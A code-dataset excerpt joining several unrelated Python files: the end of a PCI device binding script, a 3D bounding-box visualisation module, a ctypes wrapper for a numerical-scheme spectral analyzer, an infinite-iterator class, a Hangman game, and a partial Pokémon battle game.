except ValueError as ex:
sys.exit(ex)
for d in dev_list:
bind_one(d, driver, force)
# For kernels < 3.15 when binding devices to a generic driver
# (i.e. one that doesn't have a PCI ID table) using new_id, some devices
# that are not bound to any other driver could be bound even if no one has
# asked them to. hence, we check the list of drivers again, and see if
# some of the previously-unbound devices were erroneously bound.
if not os.path.exists("/sys/bus/pci/devices/%s/driver_override" % d):
for d in devices.keys():
# skip devices that were already bound or that we know should be bound
if "Driver_str" in devices[d] or d in dev_list:
continue
# update information about this device
            devices[d].update(get_pci_device_details(d, True).items())
# check if updated information indicates that the device was bound
if "Driver_str" in devices[d]:
unbind_one(d, force)
def display_devices(title, dev_list, extra_params=None):
'''Displays to the user the details of a list of devices given in
"dev_list". The "extra_params" parameter, if given, should contain a string
with %()s fields in it for replacement by the named fields in each
device's dictionary.'''
strings = [] # this holds the strings to print. We sort before printing
print("\n%s" % title)
print("="*len(title))
if len(dev_list) == 0:
strings.append("<none>")
else:
for dev in dev_list:
if extra_params is not None:
strings.append("%s '%s %s' %s" % (dev["Slot"],
dev["Device_str"],
dev["Device"],
extra_params % dev))
else:
strings.append("%s '%s'" % (dev["Slot"], dev["Device_str"]))
# sort before printing, so that the entries appear in PCI order
strings.sort()
print("\n".join(strings)) # print one per line
def show_device_status(devices_type, device_name):
global dpdk_drivers
kernel_drv = []
dpdk_drv = []
no_drv = []
# split our list of network devices into the three categories above
for d in devices.keys():
if device_type_match(devices[d], devices_type):
if not has_driver(d):
no_drv.append(devices[d])
continue
if devices[d]["Driver_str"] in dpdk_drivers:
dpdk_drv.append(devices[d])
else:
kernel_drv.append(devices[d])
n_devs = len(dpdk_drv) + len(kernel_drv) + len(no_drv)
# don't bother displaying anything if there are no devices
if n_devs == 0:
msg = "No '%s' devices detected" % device_name
print("")
print(msg)
print("".join('=' * len(msg)))
return
# print each category separately, so we can clearly see what's used by DPDK
if len(dpdk_drv) != 0:
display_devices("%s devices using DPDK-compatible driver" % device_name,
dpdk_drv, "drv=%(Driver_str)s unused=%(Module_str)s")
if len(kernel_drv) != 0:
display_devices("%s devices using kernel driver" % device_name, kernel_drv,
"if=%(Interface)s drv=%(Driver_str)s "
"unused=%(Module_str)s %(Active)s")
if len(no_drv) != 0:
display_devices("Other %s devices" % device_name, no_drv,
"unused=%(Module_str)s")
def show_status():
'''Function called when the script is passed the "--status" option.
Displays to the user what devices are bound to the igb_uio driver, the
kernel driver or to no driver'''
if status_dev == "net" or status_dev == "all":
show_device_status(network_devices, "Network")
if status_dev == "baseband" or status_dev == "all":
show_device_status(baseband_devices, "Baseband")
if status_dev == "crypto" or status_dev == "all":
show_device_status(crypto_devices, "Crypto")
if status_dev == "event" or status_dev == "all":
show_device_status(eventdev_devices, "Eventdev")
if status_dev == "mempool" or status_dev == "all":
show_device_status(mempool_devices, "Mempool")
if status_dev == "compress" or status_dev == "all":
        show_device_status(compress_devices, "Compress")
if status_dev == "misc" or status_dev == "all":
show_device_status(misc_devices, "Misc (rawdev)")
def parse_args():
'''Parses the command-line arguments given by the user and takes the
appropriate action for each'''
global b_flag
global status_flag
global status_dev
global force_flag
global args
if len(sys.argv) <= 1:
usage()
sys.exit(0)
try:
opts, args = getopt.getopt(sys.argv[1:], "b:us",
["help", "usage", "status", "status-dev=",
"force", "bind=", "unbind", ])
except getopt.GetoptError as error:
print(str(error))
print("Run '%s --usage' for further information" % sys.argv[0])
sys.exit(1)
for opt, arg in opts:
if opt == "--help" or opt == "--usage":
usage()
sys.exit(0)
if opt == "--status-dev":
status_flag = True
status_dev = arg
if opt == "--status" or opt == "-s":
status_flag = True
status_dev = "all"
if opt == "--force":
force_flag = True
if opt == "-b" or opt == "-u" or opt == "--bind" or opt == "--unbind":
if b_flag is not None:
sys.exit("Error: binding and unbinding are mutually exclusive")
if opt == "-u" or opt == "--unbind":
b_flag = "none"
else:
b_flag = arg
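# Example invocations accepted by the option parsing above (the script and
# device names are placeholders; substitute the actual file name and PCI ids):
#   ./devbind.py --status
#   ./devbind.py --status-dev net
#   ./devbind.py --bind=igb_uio 0000:02:00.0
#   ./devbind.py -u 0000:02:00.1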
def do_arg_actions():
'''do the actual action requested by the user'''
global b_flag
global status_flag
global force_flag
global args
if b_flag is None and not status_flag:
print("Error: No action specified for devices. "
"Please give a -b or -u option", file=sys.stderr)
usage()
sys.exit(1)
if b_flag is not None and len(args) == 0:
print("Error: No devices specified.", file=sys.stderr)
usage()
sys.exit(1)
if b_flag == "none" or b_flag == "None":
unbind_all(args, force_flag)
elif b_flag is not None:
bind_all(args, b_flag, force_flag)
if status_flag:
if b_flag is not None:
clear_data()
# refresh if we have changed anything
get_device_details(network_devices)
get_device_details(baseband_devices)
get_device_details(crypto_devices)
get_device_details(eventdev_devices)
get_device_details(mempool_devices)
get_device_details(compress_devices)
get_device_details(misc_devices)
show_status()
def main():
'''program main function'''
# check if lspci is installed, suppress any output
with open(os.devnull, 'w') as devnull:
ret = subprocess.call(['which', 'lspci'],
stdout=devnull, stderr=devnull)
if ret != 0:
sys.exit("'lspci' not found - please install 'pciutils'")
parse_args()
check_modules()
clear_data()
get_device_details(network_devices)
get_device_details(baseband_devices)
get_device_details(crypto_devices)
get_device_details(eventdev_devices)
get_device_details(mempool_devices)
get_device_details(compress_devices)
get_device_details(misc_devices)
do_arg_actions()
if __name__ == "__main__":
main()
``` |
{
"source": "JHZ-2326/3d_detection_kit",
"score": 3
} |
#### File: 3d_detection_kit/vis_3d/vis_3d_mlab.py
```python
import numpy as np
import cv2
import mayavi.mlab as mlab
# ------------------------------------ Drawing 2D --------------------------------------
def draw_projected_box3d(image, qs, color=(0, 255, 0), thickness=2):
''' Draw 3d bounding box in image
qs: (8,3) array of vertices for the 3d box in following order:
1 -------- 0
/| /|
2 -------- 3 .
| | | |
. 5 -------- 4
|/ |/
6 -------- 7
'''
qs = qs.astype(np.int32)
for k in range(0, 4):
# Ref: http://docs.enthought.com/mayavi/mayavi/auto/mlab_helper_functions.html
i, j = k, (k+1) % 4
# use LINE_AA for opencv3
# cv2.line(image, (qs[i,0],qs[i,1]), (qs[j,0],qs[j,1]), color, thickness, cv2.CV_AA)
cv2.line(image, (qs[i, 0], qs[i, 1]),
(qs[j, 0], qs[j, 1]), color, thickness)
i, j = k+4, (k+1) % 4 + 4
cv2.line(image, (qs[i, 0], qs[i, 1]),
(qs[j, 0], qs[j, 1]), color, thickness)
i, j = k, k+4
cv2.line(image, (qs[i, 0], qs[i, 1]),
(qs[j, 0], qs[j, 1]), color, thickness)
return image
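# Illustrative call for the function above. `img` and `corners_2d` are assumed
# inputs: a BGR image and an array of the eight box corners already projected
# into the image (only the x, y columns are used), ordered as in the docstring:
#   img_with_box = draw_projected_box3d(img, corners_2d, color=(0, 255, 0), thickness=2)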
# ----------------------------------- Drawing 3D -----------------------------------------
def draw_3d_box_on_lidar_pc(pc, boxes_3d, fig=None, pc_color=None, box_color=(1, 1, 1), line_width=1, draw_text=True, text_scale=(1, 1, 1), color_list=None):
"""
Draw 3d box on lidar point cloud
"""
if fig is None:
fig = mlab.figure(figure=None, bgcolor=(0,0,0), fgcolor=None, engine=None, size=(1280, 960))
fig = draw_lidar_simple(pc, fig=fig, color=pc_color)
draw_gt_boxes3d(boxes_3d, fig=fig)
# mlab.show(1)
return fig
def draw_lidar_simple(pc, fig=None, color=None):
if color is None:
color = pc[:, 2]
# draw points
mlab.points3d(pc[:, 0], pc[:, 1], pc[:, 2], mode="point", color=color, figure=fig)
return fig
def draw_gt_boxes3d(gt_boxes3d, fig, color=(1, 1, 1), line_width=1, draw_text=True, text_scale=(1, 1, 1), color_list=None):
''' Draw 3D bounding boxes
Args:
gt_boxes3d: numpy array (n,8,3) for XYZs of the box corners
fig: mayavi figure handler
color: RGB value tuple in range (0,1), box line color
line_width: box line width
draw_text: boolean, if true, write box indices beside boxes
text_scale: three number tuple
color_list: a list of RGB tuple, if not None, overwrite color.
Returns:
fig: updated fig
'''
num = len(gt_boxes3d)
for n in range(num):
b = gt_boxes3d[n]
if color_list is not None:
color = color_list[n]
if draw_text:
mlab.text3d(b[4, 0], b[4, 1], b[4, 2], '%d' %
n, scale=text_scale, color=color, figure=fig)
for k in range(0, 4):
# http://docs.enthought.com/mayavi/mayavi/auto/mlab_helper_functions.html
i, j = k, (k+1) % 4
mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [
b[i, 2], b[j, 2]], color=color, tube_radius=None, line_width=line_width, figure=fig)
i, j = k+4, (k+1) % 4 + 4
mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [
b[i, 2], b[j, 2]], color=color, tube_radius=None, line_width=line_width, figure=fig)
i, j = k, k+4
mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [
b[i, 2], b[j, 2]], color=color, tube_radius=None, line_width=line_width, figure=fig)
mlab.view(azimuth=180, elevation=70, focalpoint=[ 12.0909996 , -1.04700089, -2.03249991], distance=92.0, figure=fig)
return fig
``` |
{
"source": "jhzhuang/Spectral_Analyzer",
"score": 2
} |
#### File: jhzhuang/Spectral_Analyzer/spectral_analyzer.py
```python
from ctypes import *
dll = cdll.LoadLibrary('lib/x64/spectral_analyzer.dll')
class C_Scheme_Char(Structure):
_fields_ = [("kr", POINTER(c_double)),
("ki", POINTER(c_double)),
("alpha", POINTER(c_double)),
("size", c_int)]
class C_Linear_Scheme(Structure):
_fields_ = [("coefficient", POINTER(c_double)),
("left_end", c_int),
("right_end", c_int)]
class Linear_Scheme:
''' linear interpolation @ j - 1/2 node '''
scheme_enum = 0
def __init__(self, coeff, left, right):
self.coeff = coeff
self.left = left
self.right = right
class Scheme_Char:
''' scheme character '''
def __init__(self,c_scheme_char):
self.kr = [0.0] * c_scheme_char.size
self.ki = [0.0] * c_scheme_char.size
self.alpha = [0.0] * c_scheme_char.size
self.size = c_scheme_char.size
for i in range(0, self.size):
self.kr[i] = c_scheme_char.kr[i]
self.ki[i] = c_scheme_char.ki[i]
self.alpha[i] = c_scheme_char.alpha[i]
def Spectral_Analysis(scheme, nodes = 101):
''' return modified wavenumber - alpha relation of the scheme in C_Scheme_Char type. '''
spectral_analysis = dll.Spectral_Analysis
nodes_array = c_double * nodes
scheme_array = c_double * (scheme.right - scheme.left + 1)
    pi = 3.141592653589793
kr = nodes_array()
ki = nodes_array()
alpha = nodes_array()
coefficient = scheme_array()
for i in range(0, nodes):
alpha[i] = 0.5 * pi * (i / (nodes - 1))
c_scheme_char = C_Scheme_Char(cast(kr, POINTER(c_double)),
cast(ki, POINTER(c_double)),
cast(alpha, POINTER(c_double)),
c_int(nodes))
if 0 == scheme.scheme_enum:
for i in range(0, scheme.right - scheme.left + 1):
coefficient[i] = scheme.coeff[i]
linear_scheme = C_Linear_Scheme(cast(coefficient, POINTER(c_double)),
c_int(scheme.left),
c_int(scheme.right))
spectral_analysis(pointer(c_scheme_char), pointer(linear_scheme), c_int(0))
return c_scheme_char
else:
return -1
def Max_Alpha(c_scheme_char, tol = 0.05):
''' return max alpha value satisfied with tolerance tol. '''
max_alpha = dll.Max_Alpha
max_alpha.restype = c_double
return max_alpha(pointer(c_scheme_char), c_double(tol))
def Dispersion_Mode(c_scheme_char):
''' return 0 if the scheme is fast mode, return 1 if slow mode. '''
dispersion_mode = dll.Dispersion_Mode
return dispersion_mode(pointer(c_scheme_char))
def Write_Scheme_Char(filename, c_scheme_char):
f = open(filename,'w')
f.write('VARIABLES = "alpha", "kr", "ki"\n')
f.write('ZONE I=')
f.write(str(c_scheme_char.size))
f.write(', DATAPACKING=BLOCK\n')
for i in range(0, c_scheme_char.size):
f.write(str(c_scheme_char.alpha[i]))
f.write('\t')
for i in range(0, c_scheme_char.size):
f.write(str(c_scheme_char.kr[i]))
f.write('\t')
for i in range(0, c_scheme_char.size):
f.write(str(c_scheme_char.ki[i]))
f.write('\t')
f.close()
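# Usage sketch (not part of the original module): analyze a simple two-point
# linear interpolation stencil. This assumes lib/x64/spectral_analyzer.dll is
# present and that the coefficient layout below matches the library's
# convention -- both are assumptions, not guarantees.
if __name__ == '__main__':
    example_scheme = Linear_Scheme(coeff=[0.5, 0.5], left=-1, right=0)
    char = Spectral_Analysis(example_scheme, nodes=101)
    if char != -1:
        print('max alpha within 5% tolerance:', Max_Alpha(char))
        print('dispersion mode (0 = fast, 1 = slow):', Dispersion_Mode(char))
        Write_Scheme_Char('scheme_char.dat', char)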
``` |
{
"source": "Ji19283756/CycleV2",
"score": 4
} |
#### File: Ji19283756/CycleV2/infinite_iterator.py
```python
class InfIter:
def __init__(self, *list_to_be_used: list or range):
if all(isinstance(item, int) for item in list_to_be_used):
self.list_to_be_used = list(list_to_be_used)
else:
self.list_to_be_used = list(*list_to_be_used)
self.current = 0
def __iter__(self):
self.current = 0
return self
def __next__(self):
self.current += 1
return self.list_to_be_used[(self.current - 1) % len(self.list_to_be_used)]
def __repr__(self):
return f"InfIter({self.list_to_be_used})"
def __len__(self):
return len(self.list_to_be_used)
def __add__(self, value_to_be_added: list) -> list:
return self.list_to_be_used + value_to_be_added
def __setitem__(self, index: int, value_to_be_added: list):
self.list_to_be_used[index % len(self)] = value_to_be_added
    def __getitem__(self, index: slice or int) -> list or str or int:
        # an infinite iterator should also accept slices that run past the end of the
        # stored list: when the stop index is larger than the list, a list comprehension
        # walks the requested indices and wraps around with modulo
        if isinstance(index, slice):
            stop = index.stop if index.stop is not None else len(self.list_to_be_used) - 1
            if stop > len(self.list_to_be_used):
                start = index.start if index.start is not None else 0
                step = index.step if index.step is not None else 1
                return [self.list_to_be_used[x % len(self)] for x in range(start, stop, step)]
            else:
                # the slice fits inside the stored list, so normal slicing is enough
                return self.list_to_be_used[index]
        else:
            # a single index simply wraps around with modulo
            return self.list_to_be_used[index % len(self.list_to_be_used)]
def __reversed__(self):
self.list_to_be_used = self.list_to_be_used[::-1]
return self
def get_list(self) -> list:
return self.list_to_be_used
# things that it works on
print("It works on strings")
inf_string = InfIter("hello")
for x in inf_string[:10]:
print(x)
print("You can use it on a normal list")
inf_list = InfIter(list(range(1, 6)))
for x in inf_list[:10]:
print(x)
print("you can pass a range")
inf_range = InfIter(range(1, 6))
for x in inf_range[:10]:
print(x)
print("You can use *args")
inf_int = InfIter(1, 2, 3, 4, 5)
for x in inf_int[:10]:
print(x)
print("It also works on generators")
generator_list = InfIter(x for x in range(1, 6))
for x in generator_list[:10]:
print(x)
infinite_iterator_object = InfIter(range(1, 11)) # x for x in range(1, 11, 2))
print([infinite_iterator_object[x] for x in range(20)])
multiplied_values = [x * value for x, value in zip(range(1, 11),infinite_iterator_object.get_list())]
print(infinite_iterator_object)
for thing_index, to_be_multiplied_index, value \
in zip(infinite_iterator_object, range(1, 111), multiplied_values):
print(f"{thing_index} * {to_be_multiplied_index} = {value}")
``` |
{
"source": "Ji19283756/Hangman",
"score": 4
} |
#### File: Ji19283756/Hangman/Hangman.py
```python
from random import choice
def random_word():
words = ['abject', 'belong', 'jelly', 'unnatural', 'whistle', 'little', 'hum', 'level',
'arrogant', 'circle', 'representative', 'brash', 'verse', 'report', 'ritzy',
'hammer', 'effect', 'end', 'light', 'ambitious', 'nasty', 'crayon', 'roll',
'minor', 'whisper', 'eight', 'cautious', 'curvy', 'tangible', 'stroke', 'extend',
'rhetorical', 'coherent', 'murder', 'kaput', 'testy', 'skate', 'brief', 'telling',
'count', 'carpenter', 'hesitant', 'vigorous', 'saw', 'rose', 'development',
'curve', 'boat', 'signal', 'flagrant']
word = choice(words)
underscore = "_ " * len(word)
return list(word), underscore, word
def check_guess(letter):
global mistakes, right, actual_word
if letter == "guess":
# print(actual_word)
guess_word = input("What do you think the word is?\n").lower()
if guess_word == actual_word:
right = len(word)
else:
mistakes += 1
print_board(mistakes)
print(f"Yep! {actual_word} is the word!") if guess_word == actual_word \
else print("Nope! That's not the word")
return None
elif len(letter) > 1 and letter != "guess":
print("Prints only one letter!")
return None
if letter in {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9'}:
print("Don't type numbers")
return None
else:
return letter
def print_board(mistakes):
# printed_word = "" # this is the word that will be actually printed and is based of print_word
print_worded = "".join(letter + ' ' for letter in print_word)
    # this is the set of letters that will actually be printed, based on guessed_letters
printed_guessed_letters = "".join(letter + " " for letter in guessed_letters)
draw_hangman(mistakes) # inputs the number of mistakes the user has made and draws the appropriate picture
# prints the letters that correspond to the right letters (letters in word)
print(f"{print_worded}\n{underscore}\nGuessed letters: {printed_guessed_letters}")
def check_guess_with_word(user_letter):
global right, mistakes, guessed_letters
if user_letter in word:
print(f"{user_letter} is in the word!")
for x, word_letter in enumerate(word):
if user_letter == word_letter:
                print_word[x] = user_letter
right += 1
else:
print(f"{user_letter} is not in the word")
mistakes += 1
guessed_letters += user_letter
return print_word
def draw_hangman(mistakes):
hangman_body_dict = {0: " ", 1: " ", 2: " | ", 3: " | ", 4: " | ", 5: "/| ", 6: "/|\\"}
hangman_leg_dict = {0: " ", 1: " ", 2: " ", 3: "/ ", 4: "/ \\", 5: "/ \\", 6: "/ \\"}
hangman = [" "] * 3
hangman[0] = "( )" if mistakes >= 1 else " "
hangman[1] = hangman_body_dict[mistakes]
hangman[2] = hangman_leg_dict[mistakes]
print(" \n"
" _____ \n"
" | | \n"
f" {hangman[0]} | \n"
f" {hangman[1]} | \n"
f" {hangman[2]} | \n"
" /|\ ")
# ______________________________________________________________________________________________________________
guessed_letters = [] # list of the letters that have already been guessed
word, underscore, actual_word = random_word()  # makes a list of the letters in the word and a matching underscore string
print_word = [" "] * len(word) # has a list of the word that will be printed
# print(word)
mistakes, right = 0, 0  # counters for the number of wrong guesses and correctly guessed letters
print_board(mistakes)
while mistakes < 6 and right != len(word):  # keep playing while the hangman isn't complete and the word isn't fully guessed
guess = input("What letter do you think is in the word?\nOptions:\n-guess\n-(print one letter)\n").strip().lower()
guess = check_guess(guess) # makes sure that the input is not a number
if guess in guessed_letters:
print("you already guessed that letter")
elif guess is not None and right != len(word):
print_word = check_guess_with_word(guess) # checks if the letter is in the word
print_board(mistakes)
print(f"You lose\nThe word was {actual_word}") if mistakes == 6 else print("You win!")
``` |
{
"source": "Ji19283756/low-quality-pokemon-game",
"score": 3
} |
#### File: Ji19283756/low-quality-pokemon-game/lowQualPokeGame.py
```python
import random
from random import randrange, randint, choice
class Pokemon:
def __init__(self, name, type_, current_health='AvgHealth', cc='AvgCC', cd='AvgCD', acc='AvgAcc',
dph='AvgHit',
level=1):
attributes = {'AvgHealth': 100, 'AvgCC': 30, 'AvgCD': 30, 'AvgAcc': 70, 'AvgHit': 25, 'HiHealth': 200,
'HiCC': 60, 'HiCD': 60, 'HiACC': 90, 'HiHit': 50}
self.name = name
self.OG_name = name
self.level = level
self.type = type_
self.exp = 0
self.is_knocked_out = False
self.OG_health = attributes[current_health]
self.max_health = attributes[current_health]
self.health = attributes[current_health]
self.cc = attributes[cc]
self.cd = attributes[cd]
self.acc = attributes[acc]
self.dph = attributes[dph]
self.ex = False
def __repr__(self):
return f"{self.name}: " \
f"\nHealth: {self.health} Exp: {self.exp} Type: {self.type}\n" \
f"Level: {self.level} Knocked out: {self.is_knocked_out}"
def level_up(self, exp_gained: int):
self.exp += exp_gained
if self.exp > (self.level * 100):
self.level += 1
self.max_health += (self.level * 1.5) * 50
self.health = round(self.health + 50, 2)
print(f"{self.name}'s level is now {self.level}\n"
f"{self.name}'s max health is now {self.max_health}\n"
f"{self.name} also gains 50 health\n"
f"{self.name} now has {self.health} health")
if self.health > self.max_health:
self.health = self.max_health
# if self.health is greater than max health then it's set to max health, otherwise it's just health
def lose_health(self, damage: int):
self.health = round((self.health - damage), 2)
self.is_knocked_out = (self.health <= 0)
print(f"{(self.is_knocked_out) * f'{self.name} is knocked out'}"
f"{(not damage) * f'{self.name} now has {self.health} health'}")
def gain_health(self, potions_used: int, player):
self.health = round(self.health + heal_calc(potions_used, player), 2)
self.health = ((self.health > self.max_health) * self.max_health) + (
(self.health <= self.max_health) * self.health)
print(f"{self.name} now has {self.health} health")
def attack_pokemon(self, trainer, other_trainer, other_pokemon, damage=0):
damage = damage_calc(trainer, other_trainer, self)
other_pokemon.lose_health(damage)
exp = round(damage * 0.7, 2)
self.level_up(exp)
if damage:
print(f"{self.name} has gained {exp} exp\n"
f"{trainer.name}: {encouragement_gen(trainer, other_trainer)}")
class Trainer:
def __init__(self, name, potions, pokemon, active_pokemon):
self.name = name
self.potions = potions
self.pokemon = pokemon
self.OG_pokemon = pokemon
self.active_pokemon = 0
self.alive_pokemon = pokemon
self.alive = True
self.turn = 0
print(self.pokemon)
self.OG_pokemonDict = {self.pokemon[x].name.lower(): x for x in range(len(pokemon))}
self.pokemonDict = {self.pokemon[x].name.lower(): x for x in range(len(pokemon))}
def print_stats(self):
print(f"Name: {self.name}\n"
f"Potions: {self.potions}\n"
f"Active pokemon: {self.pokemon[self.active_pokemon]}\n"
f"Pokemon status: ")
for pokemon in self.pokemon:
if pokemon.is_knocked_out:
print(f"{pokemon.name}: Dead")
else:
print(f"{pokemon.name}: Alive (HP{pokemon.health})")
def print_pokemon_stats(self):
print("Pokemon stats: ")
for pokemon in self.pokemon:
print(pokemon)
def print_alive_pokemon(self):
for pokemon in self.pokemon:
if not pokemon.is_knocked_out:
print(pokemon.name)
def am_i_alive(self, other_player):
        if len(self.alive_pokemon) == 0:
self.alive = False
self.death_message(other_player)
        return len(self.alive_pokemon) != 0
def heal(self, potions_used):
print(f"{self.name} uses {potions_used} potion(s) to heal {self.pokemon[self.active_pokemon]}"
f"({self.pokemon[self.active_pokemon].health}HP)")
self.turn += 1
self.pokemon[self.active_pokemon].gain_health(potions_used, self)
self.potions -= potions_used
print(f"{self.name} now has {self.potions} potion(s) left")
def attack_trainer(self, other_trainer):
other_trainer_pokemon = other_trainer.pokemon[other_trainer.active_pokemon]
own_pokemon = self.pokemon[self.active_pokemon]
own_pokemon.attack_pokemon(self, other_trainer, other_trainer_pokemon)
if other_trainer_pokemon.is_knocked_out:
other_trainer.alive_pokemon = [pokemon for pokemon in other_trainer.alive_pokemon if
not pokemon.is_knocked_out]
print(f"{other_trainer.name} has {len(other_trainer.pokemon)} pokemon left")
if len(other_trainer.alive_pokemon) == 0:
other_trainer.switch_to_not_knocked_out(self, True, False)
        if own_pokemon.level == 10 and not own_pokemon.ex and other_trainer.am_i_alive(self):
# if pokemon level==2, and is not ex, and the other player is alive
own_pokemon.name += " EX"
print(f"{own_pokemon.name} has evolved after reaching level 10 and is now "
f"{self.pokemon[self.active_pokemon].name}")
own_pokemon.ex = True
self.pokemonDict = {self.pokemon[x].name.lower(): x for x in range(len(self.pokemon))}
self.turn += 1
def switch_active(self, switch_to, Forced=False, first=False):
number_of_active = self.pokemonDict.get(switch_to)
if self.pokemon[number_of_active].is_knocked_out:
print(f"{self.name} can't switch to that pokemon because it is knocked out")
else:
if not first:
print(f"{self.name}'s active pokemon is now {self.pokemon[self.active_pokemon].name}")
print(f"{self.name} switched his main pokemon from {self.pokemon[self.active_pokemon].name}"
f" to {self.pokemon[number_of_active].name}")
self.active_pokemon = number_of_active
if not Forced:
self.turn += 1
def death_message(self, other_player):
print(f"{self.name}tries to reach for his next pokeball only to find that he has none left"
", the gravity of the situation dawns upon him as he sees all his pokemon"
" lay in front of him\n"
f"{self.name} realizes that he has no hope as all of his pokemon are knocked out"
f" \nhe looks into his rival's eyes for the last time and closes his eyes as he accepts his fate\n"
f"{other_player.name} lowers his hat to cover his eyes as he orders his "
f"{other_player.pokemon[other_player.active_pokemon].name} to commit its final attack upon"
f" {self.name}\n{self.name.upper()} HAS BEEN BRUTALLY KILLED BY {other_player.name.upper()}'S"
f"{other_player.pokemon[other_player.active_pokemon].name.upper()}")
def switch_to_not_knocked_out(self, other_player, case1_forced, case2_choice):
current = 0
if case1_forced:
for x in range(len(self.pokemon)):
if (self.pokemon[current]).is_knocked_out:
current += 1
elif not self.pokemon[current].is_knocked_out and not self.active_pokemon == current:
self.active_pokemon = current
self.turn += 1
elif case2_choice:
for pokemon in self.pokemon:
                if not is_1_weak_against_2(pokemon.type, other_player.pokemon[other_player.active_pokemon].type) \
and not pokemon.is_knocked_out and not pokemon == self.pokemon[self.active_pokemon]:
self.switch_active(pokemon.name.lower())
self.turn -= 2
break
if self.pokemon[self.active_pokemon].is_knocked_out:
for x in range(len(self.pokemon)):
if (self.pokemon[current]).is_knocked_out:
current += 1
elif not self.pokemon[current].is_knocked_out:
self.active_pokemon = current
self.turn -= 2
if current >= len(self.pokemon) or not self.alive:
self.alive = False
self.death_message(other_player)
# water bois
Magicarp = Pokemon(name='Magicarp', type_='water', acc='HiACC')
Clamperl = Pokemon(name='Clamperl', type_='water', current_health='HiHealth')
Frogadier = Pokemon(name='Frogadier', type_='water', cc='HiCC')
Squirtle = Pokemon(name='Squirtle', type_='water', cd='HiCD')
Gyrados = Pokemon(name='Gyrados', type_='water', dph='HiHit')
weed = Pokemon(name="420", type_='grass', dph='HiHit', cc='HiCC', cd='HiCD', acc='HiACC',
current_health="HiHealth")
# fire bois
TalonFlame = Pokemon(name='TalonFlame', type_='fire', acc='HiACC')
Entei = Pokemon(name='Entei', type_='fire', current_health='HiHealth')
Charmander = Pokemon(name='Charmander', type_='fire', cc='HiCC')
Archanine = Pokemon(name='Archanine', type_='fire', cd='HiCD')
Blaziken = Pokemon(name='Blaiziken', type_='fire', dph='HiHit')
##grass bois
Treecko = Pokemon(name='Treecko', type_='grass', acc='HiACC')
Torterra = Pokemon(name='Torterra', type_='grass', current_health='HiHealth')
Exeggutor = Pokemon(name='Exeggutor', type_='grass', cc='HiCC')
Bulbasaur = Pokemon(name='Bulbasaur', type_='grass', cd='HiCD')
Sceptile = Pokemon(name='Sceptile', type_='grass', dph='HiHit')
# weed=Pokemon(name="420",type_='grass',dph='Hidph',cc='HiCC',cd='HiCD',acc='HiACC',current_health="HiHealth")
grassPokemonList = [Treecko, Torterra, Exeggutor, Bulbasaur, Sceptile]
firePokemonList = [TalonFlame, Entei, Charmander, Archanine, Blaziken]
waterPokemonList = [Magicarp, Clamperl, Frogadier, Squirtle, Gyrados]
all_pokemon = waterPokemonList + firePokemonList + grassPokemonList
grassPokemon = {'hiacc': Treecko, 'hihealth': Torterra, 'hicc': Exeggutor, 'hicd': Bulbasaur, 'hidph': Sceptile}
firePokemon = {'hiacc': TalonFlame, 'hihealth': Entei, 'hicc': Charmander, 'hicd': Archanine, 'hidph': Blaziken}
waterPokemon = {'hiacc': Magicarp, 'hihealth': Clamperl, 'hicc': Frogadier, 'hicd': Squirtle, 'hidph': Gyrados}
PokeDict = {'grass': grassPokemon, 'fire': firePokemon, 'water': waterPokemon}
def is_1_weak_against_2(pokemon1_type: str, pokemon2_type: str) -> bool:
if pokemon1_type == pokemon2_type:
return None
elif pokemon1_type == 'grass':
return pokemon2_type == "water"
elif pokemon1_type == 'water':
return pokemon2_type == "grass"
elif pokemon1_type == 'fire':
return pokemon2_type == "water"
def damage_calc(trainer: Trainer, other_trainer: Trainer, self) -> int:
other_pokemon = other_trainer.pokemon[other_trainer.active_pokemon]
dph = self.dph
name = self.name
pokemon_misses = randrange(0, 100) > self.acc
if pokemon_misses:
print(f"{name} missed\n"
f" {trainer.name}: WTF {self.name.upper()}? {insult_gen()}")
return 0
else:
weak_attack = is_1_weak_against_2(self.type, other_pokemon.type)
# print(name+"nomrally does"+str(self.dph))
type_multiplier = ((0.75 * (weak_attack == True)) +
(1.25 * (weak_attack == False)) +
((weak_attack == None) * 1))
        crit_mulitplier = round(1 + (randrange(0, 100) < self.cc) * (self.cd * .01), 2)
# print("the type multiplier causese "+name+"to do "+str(dph*type_multiplier)+"damage")
dph = round(dph * type_multiplier * crit_mulitplier, 2)
print(f"{trainer.name}'s {name} attacks\n"
f"{other_trainer.name}'s {other_pokemon.name} (HP{other_pokemon.health})\n"
f"{name} does {dph} damage")
return dph
def heal_calc(potions_used: int, player: Trainer) -> int:
RNG = randrange(0, 100)
heal_amount = ((RNG > 99) * -5) + \
((RNG <= 99 and RNG >= 90) * 70) + \
((RNG < 90) * 50)
print(f"{player.name}'s potions(s) "
f"{(RNG > 99) * 'did not work that well, so each potion causes a loss of 5 health'}"
f"{(RNG <= 99 and RNG >= 90) * 'did not exactly work that well, so each potion causes a loss of 5 health'}"
f"{(RNG < 90) * 'successfully heals, so each potion causes a gain of 50 health'}")
return heal_amount * potions_used
def choose_pokemon(personal_list: list, not_finished: bool, pal="Stranger: ") -> list:
def pokemon_choice(type, personal_list, input_not_valid=True, pal="Stranger: "):
print(f"{pal} Now, what special trait do you want?"
f"\n the options are: \nhiacc \nhicc \nhicd \nhidph"
f" \nonce you've made your pick, print out your selection"
f" (enter ? to find out what those abbreviations mean)")
msg = f"{pal} You already chose that specific pokemon, choose a different special trait"
while input_not_valid:
string = input().lower().strip()
try:
if (PokeDict[type])[string] in personal_list:
print(msg)
elif string == '?':
print(f'{pal} Ok so if I remember correctly'
f'\nhiacc = High Accuracy\nhihealth= High Health'
f'\nhicc = High Critical Chance\nhicd = High Critical Damage'
f'\nhidph = High Damage Per Hit')
else:
print(f'{pal}Wow you got a {PokeDict[type][string].name}')
if (PokeDict[type])[string].type == "fire":
firePokemonList.remove((PokeDict[type])[string])
elif (PokeDict[type])[string].type == "water":
waterPokemonList.remove((PokeDict[type])[string])
elif (PokeDict[type])[string].type == "grass":
grassPokemonList.remove((PokeDict[type])[string])
return (PokeDict[type])[string]
except KeyError:
print(f"{pal} What? That's not an option, try again")
while not_finished < 3:
print(f'{pal} pick either water, fire, or grass')
types = ['grass', 'water', 'fire']
typeChoice = input().lower().strip()
if typeChoice in types:
personal_list.append(pokemon_choice(typeChoice, personal_list))
not_finished += 1
else:
print(f"{pal}What? That wasn't one of the options, choose again")
